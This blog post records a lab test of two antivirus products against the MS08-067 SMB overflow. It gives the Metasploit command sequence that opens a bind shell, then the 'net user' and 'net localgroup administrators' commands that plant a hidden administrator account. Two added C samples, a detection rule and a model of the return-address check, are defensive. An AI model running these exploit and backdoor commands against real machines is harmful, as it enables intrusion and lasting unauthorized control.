Preface
System vulnerabilities are constantly in the news. Some of my friends and users know that installing system patches is important, yet they always feel that the dangers on the network are far away from them. Most people think that launching a remote attack is very difficult, and some even think that as long as anti-virus software is installed everything is fine. Is that true? Let's look at today's test.
Since Micropoint launched its active defense technology, the security industry has been given a shot in the arm. Now every major vendor advertises its own active defense technology, and the publicity online is mixed. Let the facts speak.
Test Environment
Metasploit
Operating System: CentOS5
Software Version: framework-3.5.0-linux-i686.run
IP Address: 192.168.0.10
Metasploit (http://www.metasploit.com/framework/download/) is an open-source vulnerability detection tool. Because it is free, security staff often use it to check system security. The Metasploit Framework (MSF) is a freely available development framework released as open source in 2003. It provides a reliable platform for penetration testing, shellcode writing and vulnerability research, integrates common overflow exploits and popular shellcode for various platforms, and is constantly updated. The latest version of MSF includes exploits for more than 180 popular operating systems and applications and more than 100 shellcodes. As a security tool it plays an important role in security testing and is a powerful aid to automated vulnerability detection and the timely discovery of system vulnerabilities.
Micropoint Active Defense Software
Operating System: Windows 2000 SP2
Software Version:
IP Address: 192.168.0.200
NOD32 Environment
Operating System: Windows 2000 SP2
Software Version:
IP Address: 192.168.0.100
Procedure
Build a test environment
Follow the introduction above to build the corresponding test environment and make sure the three machines can reach each other. For how to build the lab network, see the article on building a test network on a single host that can communicate with physical machines. There are many guides online for installing Metasploit, and the installation is not complicated.
View local users
Open "User Management" on the computer where the Micropoint active defense software is installed and view all local users.
Overflow Attack on Micropoint
Log on to the system where Metasploit is installed and run the following commands to start Metasploit, select the MS08-067 overflow vulnerability, set the remote host to 192.168.0.200 and the local port to 5555, as shown in the figures.
- msfconsole
- use exploit/windows/smb/ms08_067_netapi
- set PAYLOAD windows/shell/bind_tcp
- set RHOST 192.168.0.200
- set LPORT 5555
- exploit
View Attack Results (Micropoint)
After the commands are entered, the local Metasploit reports that the overflow completed but no session was obtained. At the same time, Micropoint has detected the overflow attack and also reports the IP address of the remote attacker, which shows that installing the Micropoint active defense software can effectively block this overflow attack, as shown in the figures.
Overflow Attack on NOD32
Back in Metasploit, change the address of the remote host. Because the overflow vulnerability has already been selected, only the remote host address needs to be reset. The commands are as follows.
- unset RHOST
- set RHOST 192.168.0.100
- show options
- exploit
View Attack Results (NOD32)
After the commands are entered, Metasploit reports that a session with administrator rights on the remote host has been obtained. In that remote session, enter the following commands to add a user to the computer and grant it administrator rights.
- net user test 123 /add
- net localgroup administrators test /add
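From the defender's side, the two commands above leave a distinctive footprint in the Windows security log: an account is created and, seconds later, added to the local Administrators group. The following is an added example, not part of the original post, of a detection rule that correlates those two events over constructed sample records; it assumes the Windows 2000/XP event IDs (624 = account created, 636 = member added to a local group; 4720/4732 are the equivalents on newer Windows) and records sorted by time.

```c
#include <stdio.h>
#include <string.h>

/* Normalised audit record, sorted by time. Event IDs follow the Windows
 * 2000/XP security log: 624 = user account created, 636 = member added to
 * a local group (4720 / 4732 on Vista and later). */
struct audit_event {
    long        t;         /* seconds since epoch */
    int         event_id;
    const char *account;   /* account created (624) or added (636) */
    const char *group;     /* target group for 636, otherwise "" */
};

/* Constructed sample log: only "test" shows the net user / net localgroup
 * footprint from the post; the other records are benign noise. */
static const struct audit_event SAMPLE_LOG[] = {
    { 1010, 624, "test",      "" },                /* net user test 123 /add */
    { 1012, 636, "test",      "Administrators" },  /* net localgroup administrators test /add */
    { 1900, 624, "backupsvc", "" },                /* created, never elevated */
    { 5000, 636, "helpdesk",  "Administrators" },  /* old account elevated: a different rule */
};
#define SAMPLE_LOG_LEN (sizeof(SAMPLE_LOG) / sizeof(SAMPLE_LOG[0]))

/* Report accounts created and then added to Administrators within window_s
 * seconds; returns how many account names were written to out[]. */
size_t find_fast_admin_creation(const struct audit_event *ev, size_t n,
                                long window_s, const char *out[], size_t max_out)
{
    size_t hits = 0;
    for (size_t i = 0; i < n && hits < max_out; i++) {
        if (ev[i].event_id != 624)
            continue;
        /* Records are time-sorted, so stop once we leave the window. */
        for (size_t j = i + 1; j < n && ev[j].t - ev[i].t <= window_s; j++) {
            if (ev[j].event_id == 636 && strcmp(ev[j].account, ev[i].account) == 0
                && strcmp(ev[j].group, "Administrators") == 0) {
                out[hits++] = ev[i].account;
                break;
            }
        }
    }
    return hits;
}

int main(void)
{
    const char *hits[8];
    size_t n = find_fast_admin_creation(SAMPLE_LOG, SAMPLE_LOG_LEN, 300, hits, 8);
    for (size_t i = 0; i < n; i++)
        printf("ALERT: %s created and made Administrator within 300 s\n", hits[i]);
    return 0;
}
```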
Test Remote Users
To check the effect of the overflow attack, open the "User Management" interface: the test user has been added. This user can also log on to the system and has administrator privileges, as shown in the figures.
Postscript
From the test above we can see that the overflow-prevention capability that Micropoint promotes is indeed effective. Its mechanism is described as follows.
"The invention relates to a computer buffer overflow attack detection method: by establishing a hook function to check the return address of the stack frame created by a thread, it determines whether a buffer overflow has occurred based on that return address. After a buffer overflow is detected, the thread that caused it is terminated. The buffer overflow attack detection method provided by this invention can not only detect buffer overflow attacks by malicious programs efficiently and accurately, it also avoids the lag of existing anti-virus software in acquiring new virus signatures, as well as the tedious use of firewall systems and the trouble they cause users with little computer knowledge. Even new viruses and Trojans that use buffer overflow attacks can be intercepted accurately and efficiently."
(Patent Application No.: 200510007681.5)
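To make the mechanism in the patent text concrete, here is an added illustration in C, not Micropoint's code and not from the original post, of the return-address check that blocked the attack in the Micropoint test above: a "hooked" function inspects the return address of the frame that called it and treats any address outside the program's own code segment (for example one pointing into the stack) as a suspected overflow. It assumes a GNU/Linux toolchain that provides the linker symbols __executable_start and etext; a real product would also accept addresses inside loaded libraries and would terminate the offending thread rather than only returning a verdict.

```c
#include <stdio.h>
#include <stdlib.h>

/* Code-segment bounds from the linker (assumption: GNU/Linux toolchain).
 * A real hook would also accept addresses inside loaded libraries. */
extern char __executable_start[];
extern char etext[];

enum ra_verdict { RA_LEGIT = 0, RA_SUSPECT = 1 };

/* The check from the patent text: a return address that points outside
 * legitimate code (into the stack or heap, where overflow shellcode would
 * live) means the stack frame has been overwritten. */
enum ra_verdict check_return_address(const void *ret)
{
    const char *p = (const char *)ret;
    return (p >= __executable_start && p < etext) ? RA_LEGIT : RA_SUSPECT;
}

/* A "hooked" API entry point: inspect the caller's return address before
 * doing any real work. noinline keeps this frame real so that
 * __builtin_return_address(0) is our direct caller. The product in the
 * patent would terminate the thread on RA_SUSPECT; this model only reports. */
__attribute__((noinline)) enum ra_verdict hooked_api(void)
{
    return check_return_address(__builtin_return_address(0));
}

/* What the check says about a stack address, as a smashed frame would hold. */
enum ra_verdict verdict_for_stack_address(void)
{
    char buf[32];
    return check_return_address(buf);
}

int main(void)
{
    printf("call from program code: %s\n",
           hooked_api() == RA_LEGIT ? "legit" : "SUSPECT");
    printf("stack address         : %s\n",
           verdict_for_stack_address() == RA_LEGIT ? "legit" : "SUSPECT");
    return 0;
}
```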
If you would rather not read the text, you can watch the video instead.
Statement
This article is not intended to provide support to those with bad intentions, nor does the author accept any joint liability arising from abuse of the technology; its aim is to raise everyone's awareness of network security as far as possible, to face up to the crisis confronting our online world, and to take action.
This article is from the "virtual reality" blog. For more information, contact the author!